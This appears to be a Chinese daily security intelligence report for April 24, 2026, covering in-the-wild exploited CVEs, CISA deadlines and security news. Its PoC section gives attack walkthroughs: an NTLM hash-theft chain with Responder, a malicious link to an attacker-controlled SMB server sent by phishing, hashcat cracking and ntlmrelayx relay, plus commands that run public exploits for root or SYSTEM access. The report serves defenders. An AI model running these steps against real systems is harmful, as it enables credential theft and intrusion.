每日安全情报报告 · 2026-04-24
每日安全情报报告 · 2026-04-24
报告日期:2026年4月24日(周五)
情报窗口:近 24-48 小时
⚠️本报告包含在野利用漏洞,请相关系统管理员立即核查并修复
一、最新高危漏洞
🔴 严重(Critical)
1. CVE-2026-23751 — Kofax Capture(Tungsten Capture)未授权 RCE
| 项目 | 详情 |
|---|---|
| CVE编号 | CVE-2026-23751 |
| CVSS评分 | 9.8(严重) |
| 漏洞类型 | .NET Remoting 对象反序列化远程代码执行 |
| 受影响组件 | Kofax Capture(现 Tungsten Capture)6.0.0.0 |
| 攻击条件 | 无需认证,端口 2424 网络可达即可利用 |
| 状态 | 2026-04-23 披露,暂无补丁 |
漏洞描述:Kofax Capture 在端口 2424 上暴露了已弃用的 .NET Remoting HTTP 通道,使用默认公开的端点标识符,且对反序列化对象存在固有信任,允许未经认证的远程攻击者通过构造恶意 .NET Remoting 对象实现任意文件读写、NTLMv2 认证劫持和远程代码执行。
影响范围:任意文件读取/写入、NTLMv2 凭证窃取、远程代码执行、横向移动
参考链接:NVD 详情 | GitHub Advisory | TheHackerWire 分析
2. CVE-2026-20122 — Cisco Catalyst SD-WAN Manager 特权 API 滥用
| 项目 | 详情 |
|---|---|
| CVE编号 | CVE-2026-20122 |
| CVSS评分 | 未公开(预估严重) |
| 漏洞类型 | 特权 API 错误使用 |
| 受影响组件 | Cisco Catalyst SD-WAN Manager |
| 状态 | ⚠️在野利用中,CISA KEV 2026-04-20 新增 |
参考链接:CISA KEV 公告 | Cisco 安全公告
3. CVE-2026-20128 — Cisco Catalyst SD-WAN Manager 密码可恢复存储
| 项目 | 详情 |
|---|---|
| CVE编号 | CVE-2026-20128 |
| CVSS评分 | 未公开(预估严重) |
| 漏洞类型 | 密码以可恢复格式存储(CWE-257) |
| 受影响组件 | Cisco Catalyst SD-WAN Manager |
| 状态 | ⚠️在野利用中,CISA KEV 2026-04-20 新增 |
参考链接:CISA KEV 公告
4. CVE-2026-20133 — Cisco Catalyst SD-WAN Manager 敏感信息泄露
| 项目 | 详情 |
|---|---|
| CVE编号 | CVE-2026-20133 |
| CVSS评分 | 6.5(中等) |
| 漏洞类型 | 敏感信息泄露 |
| 受影响组件 | Cisco Catalyst SD-WAN Manager |
| 状态 | ⚠️在野利用中,CISA KEV 2026-04-20 新增,联邦修复截止日2026-04-24(今日) |
特别提醒:CISA 已下发 4 天紧急指令(ED 26-03),要求联邦机构于今日(4月24日)前完成修复。CISA 确认三个 Cisco SD-WAN 漏洞正被攻击者积极利用,攻击者可利用认证绕过实现初始访问,再通过权限提升获取 Root 权限。
参考链接:CISA KEV 公告 | BleepingComputer 报道 | Hexnode 分析
🟠 高危(High)
5. CVE-2023-27351 — PaperCut NG/MF 未认证 RCE
| 项目 | 详情 |
|---|---|
| CVE编号 | CVE-2023-27351 |
| CVSS评分 | 8.2(高危) |
| 漏洞类型 | 身份验证不当 → 远程代码执行 |
| 受影响组件 | PaperCut NG/MF |
| 状态 | ⚠️在野大规模利用中,CISA KEV 2026-04-20 新增,联邦截止2026-05-04 |
参考链接:CISA KEV 公告
6. CVE-2024-27199 — JetBrains TeamCity 路径遍历
| 项目 | 详情 |
|---|---|
| CVE编号 | CVE-2024-27199 |
| CVSS评分 | 7.3(高危) |
| 漏洞类型 | 相对路径遍历 |
| 受影响组件 | JetBrains TeamCity |
| 状态 | ⚠️在野利用中,CISA KEV 2026-04-20 新增,联邦截止2026-05-04 |
参考链接:CISA KEV 公告
7. CVE-2025-32975 — Quest KACE SMA 认证绕过
| 项目 | 详情 |
|---|---|
| CVE编号 | CVE-2025-32975 |
| 漏洞类型 | 身份验证不当 |
| 受影响组件 | Quest KACE Systems Management Appliance |
| 状态 | ⚠️在野利用中,CISA KEV 2026-04-20 新增 |
参考链接:CISA KEV 公告
8. CVE-2025-48700 — Synacor Zimbra 零点击 XSS
| 项目 | 详情 |
|---|---|
| CVE编号 | CVE-2025-48700 |
| 漏洞类型 | 零点击跨站脚本(Zero-Click XSS) |
| 受影响组件 | Synacor Zimbra Collaboration Suite (ZCS) |
| 状态 | ⚠️在野利用中,CISA KEV 2026-04-20 新增 |
参考链接:CISA KEV 公告
9. CVE-2025-2749 — Kentico Xperience 路径遍历
| 项目 | 详情 |
|---|---|
| CVE编号 | CVE-2025-2749 |
| 漏洞类型 | 路径遍历 |
| 受影响组件 | Kentico Xperience |
| 状态 | ⚠️在野利用中,CISA KEV 2026-04-20 新增 |
参考链接:CISA KEV 公告
10. CVE-2026-33829 — Windows Snipping Tool NTLM 哈希泄露
| 项目 | 详情 |
|---|---|
| CVE编号 | CVE-2026-33829 |
| CVSS评分 | 4.3(中等,实际风险更高) |
| 漏洞类型 | 信息泄露 / 网络欺骗 |
| 受影响组件 | Windows 10/11 Snipping Tool(31 个平台变体) |
| 攻击条件 | 无需权限,仅需用户点击恶意链接 |
| 状态 | 2026-04-14 已修复,PoC 已公开 |
漏洞描述:Windows Snipping Tool 注册的ms-screensketch自定义 URL 协议未正确验证filePath参数。攻击者构造恶意链接(如ms-screensketch:filePath=\\attacker-server\image.png),诱导用户点击后,Snipping Tool 会向攻击者控制的 SMB 服务器发起 NTLM 认证,窃取 Net-NTLM 哈希。攻击者可离线破解密码或利用 NTLM Relay 进行横向移动。
参考链接:NVD 详情 | Hoplon InfoSec 技术分析 | FreeBuf 报道
11. CVE-2026-39808 — FortiSandbox 未授权命令注入 RCE
| 项目 | 详情 |
|---|---|
| CVE编号 | CVE-2026-39808 |
| CVSS评分 | 9.1(严重) |
| 漏洞类型 | 未授权命令注入远程代码执行 |
| 受影响组件 | Fortinet FortiSandbox |
| 状态 | ⚠️在野利用中,PoC 已公开(GitHub: samu-delucas) |
参考链接:CyberSecurityNews 报道 | The Hacker Wire
12. CVE-2026-33825 — Windows Defender BlueHammer 提权零日
| 项目 | 详情 |
|---|---|
| CVE编号 | CVE-2026-33825 |
| CVSS评分 | 7.8(高危) |
| 漏洞类型 | TOCTOU 本地权限提升 |
| 受影响组件 | Microsoft Defender for Endpoint |
| 状态 | ⚠️在野利用中,CISA KEV,PoC 已公开(BlueHammer + RedSun) |
参考链接:CyberPress 报道 | Cyderes 分析
13. CVE-2026-32201 — Microsoft SharePoint 欺骗零日
| 项目 | 详情 |
|---|---|
| CVE编号 | CVE-2026-32201 |
| CVSS评分 | 6.5(中等) |
| 漏洞类型 | 欺骗(Spoofing) |
| 受影响组件 | Microsoft SharePoint Server |
| 状态 | ⚠️在野利用中,CISA KEV,联邦截止2026-04-28 |
参考链接:Tenable 分析
14. CVE-2026-5760 — SGLang SSTI 远程代码执行
| 项目 | 详情 |
|---|---|
| CVE编号 | CVE-2026-5760 |
| CVSS评分 | 9.8(严重) |
| 漏洞类型 | 服务器端模板注入(SSTI)→ RCE |
| 受影响组件 | SGLang AI 框架 |
| 攻击方式 | 加载恶意 GGUF 模型触发 Jinja2 SSTI |
| 状态 | PoC 已公开 |
参考链接:GitHub PoC | CSDN 昨日报告
二、最新漏洞 PoC
1. CVE-2026-33829 — Windows Snipping Tool NTLM 哈希泄露 PoC
风险等级:🟠 高(CVSS 4.3,但实际利用门槛极低)
PoC 发布者:Black Arrow Security(Marcos Díaz)
攻击原理:利用 Windows Snipping Tool 的ms-screensketch自定义协议处理器,通过构造恶意 URI 诱导用户点击,触发目标主机向攻击者控制的 SMB 服务器发起 NTLM 认证,静默窃取 Net-NTLM 哈希。
使用步骤:
# 步骤 1:搭建恶意 SMB 服务器(使用 Impacket Responder) sudo python3 responder.py -I eth0 -wrf # 步骤 2:构造恶意链接 # ms-screensketch:filePath=\\\\<你的服务器IP>\\image.png # 步骤 3:通过钓鱼邮件/网页投递恶意链接 # 受害者点击后,Responder 自动捕获 NTLM 哈希 # 步骤 4:离线破解哈希 hashcat -m 5600 captured_hash.txt /usr/share/wordlists/rockyou.txt # 步骤 5(可选):NTLM Relay 横向移动 python3 ntlmrelayx.py -tf targets.txt -smb2support参考链接:Hoplon InfoSec 详细分析 | FreeBuf 报道 | VPNCentral 报道
2. CVE-2026-39808 — FortiSandbox 未授权命令注入 PoC
风险等级:🔴 严重(CVSS 9.1,在野利用)
PoC 来源:GitHub samu-delucas
漏洞概述:Fortinet FortiSandbox 存在未授权命令注入漏洞,攻击者无需任何登录凭证,即可以 Root 权限执行任意操作系统命令。
使用步骤:
# 步骤 1:克隆 PoC 仓库 git clone https://github.com/samu-delucas/CVE-2026-39808.git cd CVE-2026-39808 # 步骤 2:安装依赖 pip3 install -r requirements.txt # 步骤 3:运行漏洞利用脚本 # 用法:python3 exploit.py <target_ip> python3 exploit.py 192.168.1.100 # 攻击者将获得目标 FortiSandbox 的 Root Shell参考链接:CyberSecurityNews 报道 | GitHub PoC 仓库
3. CVE-2026-33825 — Windows Defender BlueHammer / RedSun 提权 PoC
风险等级:🔴 严重(CVSS 7.8,在野利用,影响 10 亿设备)
PoC 来源:GitHub Nightmare-Eclipse(Chaotic Eclipse)
漏洞概述:利用 Windows Defender 的 TOCTOU(Time-of-Check-Time-of-Use)竞态条件,实现从普通用户到 SYSTEM 权限的本地提权。BlueHammer 和 RedSun 是两个独立的 PoC 实现,已被攻击者在野联合利用。
使用步骤:
# 步骤 1:克隆 BlueHammer PoC git clone https://github.com/Nightmare-Eclipse/BlueHammer.git cd BlueHammer # 步骤 2:编译利用程序 # 或使用预编译的 release 版本 # 注意:需要在目标 Windows 系统上以普通用户权限运行 # 步骤 3:执行提权 # 运行后将在竞态条件窗口中替换 Defender 的敏感文件 # 成功后获得 SYSTEM 权限的 cmd.exe # RedSun PoC(替代方案) git clone https://github.com/Nightmare-Eclipse/RedSun.git cd RedSun # 同样以普通用户权限运行即可触发提权参考链接:Cyderes BlueHammer 分析 | CyberPress 报道 | Black Swan 威胁通告
4. CVE-2026-23751 — Kofax Capture 未授权 RCE(暂无公开 PoC)
风险等级:🔴 严重(CVSS 9.8,无需认证)
PoC 状态:截至发稿暂无公开 PoC,但漏洞利用技术成熟(.NET Remoting 反序列化)
攻击原理:连接目标端口 2424 的 .NET Remoting HTTP 通道,利用反序列化实例化远程System.Net.WebClient对象,实现任意文件读写和远程代码执行。
参考链接:NVD 详情 | TheHackerWire 技术分析
三、网络安全最新文章
1. Bitwarden CLI 遭 Checkmarx 供应链攻击入侵
来源:The Hacker News / Socket / JFrog |日期:2026-04-23
摘要:密码管理器 Bitwarden 的 CLI 工具遭 Checkmarx 供应链攻击活动入侵。攻击者通过投毒的 GitHub Actions 工作流,在@bitwarden/cli@2026.4.0版本中注入恶意代码bw1.js。恶意包在 npm 上仅存活 93 分钟(17:57-19:30 EDT),但已足以造成影响。恶意载荷具备窃取 GitHub 令牌、云服务凭证、SSH 密钥等能力,并能蠕虫式传播至其他 CI/CD 管道。Bitwarden 已确认用户保险库数据未被访问。
标签:#供应链攻击#Bitwarden#Checkmarx#CI/CD安全
阅读原文 | Socket 分析 | CyberInsider 报道
2. CISA 新增 8 个在野利用漏洞,Cisco SD-WAN 三洞齐爆
来源:The Hacker News / CISA 官方 |日期:2026-04-22
摘要:CISA 于 4 月 20 日紧急新增 8 个在野利用漏洞至 KEV 目录,其中 3 个 Cisco Catalyst SD-WAN Manager 漏洞(CVE-2026-20122/20128/20133)被设为 72 小时紧急修复截止(4月23日)。其余 5 个漏洞覆盖 PaperCut、JetBrains TeamCity、Kentico Xperience、Quest KACE 和 Zimbra,截止日期为 5 月 4 日。CISA 同时更新紧急指令 ED 26-03,要求联邦机构立即排查 SD-WAN 系统安全性。
标签:#CISA#KEV#Cisco#SD-WAN#联邦安全
阅读原文 | CISA 官方公告 | iSecNews 报道
3. Oracle 4 月关键补丁更新:修复 481 个安全漏洞
来源:Qualys / Tenable / Oracle 官方 |日期:2026-04-22
摘要:Oracle 发布 2026 年第二季度关键补丁更新(CPU),共修复481 个安全漏洞(对应约 450 个唯一 CVE),覆盖 28 个产品系列。其中超过 300 个漏洞允许远程攻击者在无需认证的情况下入侵系统。Oracle E-Business Suite 收到 18 个补丁(8 个可远程利用),Oracle Fusion Middleware、数据库和 Java 也包含大量关键修复。Qualys 建议企业优先修补面向互联网的系统。
标签:#Oracle#CPU#补丁更新#企业安全
阅读原文 | Oracle 官方公告 | Tenable 分析
4. Anthropic 发布 Claude Opus 4.7,搭载自动化网络安全防护机制
来源:Anthropic / HelpNetSecurity |日期:2026-04-20
摘要:Anthropic 正式发布 Claude Opus 4.7 模型,在软件工程、视觉理解和指令遵循方面显著提升。该模型首次集成了自动化网络安全防护机制,可与 Project Glasswing 计划协同运作。与此同时,Anthropic 的安全研究项目 Mythos 也在持续推进,此前已展示 AI 独立发现并利用零日漏洞的能力,引发安全圈关于"漏洞末日"的广泛讨论。
标签:#Anthropic#Claude#AI安全#漏洞发现
阅读原文 | HelpNetSecurity 报道
5. Windows Snipping Tool NTLM 哈希泄露漏洞 PoC 公开
来源:FreeBuf / Hoplon InfoSec |日期:2026-04-21
摘要:安全研究人员公开了 Windows 截图工具(Snipping Tool)漏洞 CVE-2026-33829 的完整 PoC。该漏洞利用ms-screensketch协议的输入验证缺陷,攻击者仅需诱导用户点击恶意链接即可窃取 Net-NTLM 哈希。微软已在 4 月 Patch Tuesday 中修复该漏洞,但 PoC 公开后利用门槛极低,企业环境需特别关注。攻击者可利用泄露的哈希进行密码破解或 NTLM Relay 横向移动。
标签:#Windows#NTLM#SnippingTool#凭据窃取
阅读原文 | Hoplon InfoSec 技术分析 | 腾讯新闻
6. Foresiet 报告:6 起 AI 安全攻击事件完整攻击路径分析
来源:Foresiet |日期:2026-04-21
摘要:安全研究机构 Foresiet 发布 2026 年 4 月 AI 安全事件分析报告,详细剖析了 6 起重大 AI 安全攻击事件的完整攻击路径,涵盖 AI Agent 数据泄露、全球恶意软件活动、AI 模型利用等场景。报告显示 AI 驱动的网络攻击同比增长 89%,漏洞利用时间已从 2018 年的 756 天压缩至不足 24 小时(28.3% 的已利用漏洞在披露当天即遭攻击)。
标签:#AI攻击#威胁情报#攻击分析
阅读原文
7. Docker 授权绕过漏洞影响宿主机安全
来源:CNVD / 安全社区 |日期:2026-04-20
摘要:CNVD 收录了一个 Docker Engine AuthZ 插件绕过漏洞,攻击者可绕过 Docker 的授权机制获取宿主机控制权。该漏洞是 CVE-2024-41110 修复不完整导致的回归问题,影响使用自定义授权插件(AuthZ)的 Docker 部署环境。建议运维团队立即检查 Docker 版本并升级至最新稳定版。
标签:#Docker#容器安全#权限绕过
阅读原文
四、今日重点关注
| 优先级 | 漏洞/事件 | 理由 |
|---|---|---|
| 🔴P0 | CVE-2026-20122/20128/20133(Cisco SD-WAN) | 在野利用 + CISA 紧急指令,今日修复截止 |
| 🔴P0 | Bitwarden CLI 供应链攻击 | 密码管理器被植入后门,检查 CI/CD 管道 |
| 🟠P1 | CVE-2026-23751(Kofax Capture) | CVSS 9.8,无需认证 RCE,暂无补丁 |
| 🟠P1 | CVE-2023-27351(PaperCut) | 在野大规模利用,CISA KEV |
| 🟠P1 | CVE-2026-33829(Snipping Tool NTLM) | PoC 公开,利用门槛极低 |
| 🟡P2 | CVE-2026-39808(FortiSandbox) | 在野利用 + PoC 公开 |
| 🟡P2 | Oracle 4 月 CPU | 481 个漏洞,优先修补面向互联网的系统 |
五、CISA KEV 联邦修复截止日历
| 截止日期 | CVE | 产品 |
|---|---|---|
| 2026-04-24(今日) | CVE-2026-20122, CVE-2026-20128, CVE-2026-20133 | Cisco Catalyst SD-WAN Manager |
| 2026-04-28 | CVE-2026-32201 | Microsoft SharePoint Server |
| 2026-05-04 | CVE-2023-27351, CVE-2024-27199, CVE-2025-2749, CVE-2025-32975, CVE-2025-48700 | PaperCut / TeamCity / Kentico / KACE / Zimbra |
免责声明:本报告仅供安全研究和防御参考。漏洞信息来源于公开渠道(CISA、NVD、The Hacker News、GitHub、FreeBuf 等),请勿用于非法用途。如有遗漏或错误,欢迎指正。
数据来源:CISA KEV Catalog、NVD/NIST、The Hacker News、FreeBuf、安全客、GitHub、Qualys、Tenable、Hoplon InfoSec、CyberInsider、Foresiet、CNVD
